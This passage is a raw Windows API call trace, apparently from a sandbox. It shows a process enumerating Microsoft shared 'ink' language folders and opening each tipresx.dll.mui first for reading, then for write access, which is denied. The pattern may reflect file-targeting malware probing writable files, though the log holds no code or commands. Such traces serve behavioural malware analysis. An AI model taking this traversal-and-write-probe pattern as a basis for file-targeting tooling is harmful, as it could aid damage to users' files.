RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.503] AreFileApisANSI () returned 1 [0085.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0085.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.504] AreFileApisANSI () returned 1 [0085.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0085.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 73 [0085.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.504] GetFileType (hFile=0x334) returned 0x1 [0085.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0085.504] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.504] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.504] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.504] CloseHandle (hObject=0x334) returned 1 [0085.505] AreFileApisANSI () returned 1 [0085.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0085.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui") returned 73 [0085.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.505] GetLastError () returned 0x5 [0085.505] GetLastError () returned 0x5 [0085.505] SetLastError (dwErrCode=0x5) [0085.505] GetLastError () returned 0x5 [0085.505] SetLastError (dwErrCode=0x5) [0085.505] GetLastError () returned 0x5 [0085.505] SetLastError (dwErrCode=0x5) [0085.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0085.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0085.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.505] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0085.505] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0085.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0085.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.506] AreFileApisANSI () returned 1 [0085.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR", lpUsedDefaultChar=0x0) returned 57 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0085.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.507] AreFileApisANSI () returned 1 [0085.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0085.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 57 [0085.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.507] GetLastError () returned 0x5 [0085.507] GetLastError () returned 0x5 [0085.507] SetLastError (dwErrCode=0x5) [0085.507] GetLastError () returned 0x5 [0085.507] SetLastError (dwErrCode=0x5) [0085.507] GetLastError () returned 0x5 [0085.507] SetLastError (dwErrCode=0x5) [0085.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0085.507] AreFileApisANSI () returned 1 [0085.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0085.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 57 [0085.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.507] GetLastError () returned 0x5 [0085.507] GetLastError () returned 0x5 [0085.507] SetLastError (dwErrCode=0x5) [0085.507] GetLastError () returned 0x5 [0085.507] SetLastError (dwErrCode=0x5) [0085.507] GetLastError () returned 0x5 [0085.508] SetLastError (dwErrCode=0x5) [0085.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0085.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0085.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0085.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0085.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0085.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0085.508] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.509] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.509] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.509] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0085.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.510] AreFileApisANSI () returned 1 [0085.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0085.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.510] AreFileApisANSI () returned 1 [0085.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85580 [0085.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned 73 [0085.510] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.511] GetFileType (hFile=0x334) returned 0x1 [0085.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0085.511] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.511] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.511] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.511] CloseHandle (hObject=0x334) returned 1 [0085.511] AreFileApisANSI () returned 1 [0085.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0085.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned 73 [0085.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.512] GetLastError () returned 0x5 [0085.512] GetLastError () returned 0x5 [0085.512] SetLastError (dwErrCode=0x5) [0085.512] GetLastError () returned 0x5 [0085.512] SetLastError (dwErrCode=0x5) [0085.512] GetLastError () returned 0x5 [0085.512] SetLastError (dwErrCode=0x5) [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0085.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.512] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.512] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, 